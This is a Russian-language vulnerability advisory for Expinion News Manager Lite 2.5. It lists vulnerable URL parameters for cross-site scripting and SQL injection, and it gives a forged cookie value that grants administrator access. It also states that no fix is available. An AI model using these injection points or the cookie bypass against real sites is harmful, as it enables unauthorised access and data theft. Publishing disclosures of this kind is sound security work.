Удаленный административный досуп и другие уязвимости в Expinion News Manager Lite

Дата публикации:
23.03.2004
Дата изменения:
17.10.2006
Всего просмотров:
1080
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Expinion News Manager 2.5

Описание: Несколько уязвимостей обнаружено в Expinion News Manager Lite. Удаленный пользователь может внедриться в административную учетную запись, внедрить SQL команды и выполнить XSS нападение: 1. XSS

 http://[host]/comment_add.asp?ID=3&email=[XSS]
http://[host]/search.asp?search=[XSS]
http://[host]/cat egory_news_headline.asp?ID=2&n=[XSS]
2. SQL injection
http://[host]/more.asp?ID='[SQL query]
http://[host]/category_news.asp?ID='[SQL]
http://[host]/news_sort.asp?filter='[SQL]
3. Административный доступ:
Cookie: NEWS%5FLOGIN=ADMIN=1&ID=1

URL производителя:http://www.expinion.net/software/app_newsmanager.asp

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Vulnerabilities in News Manager Lite 2.5 & News Manager Lite administration

или введите имя

CAPTCHA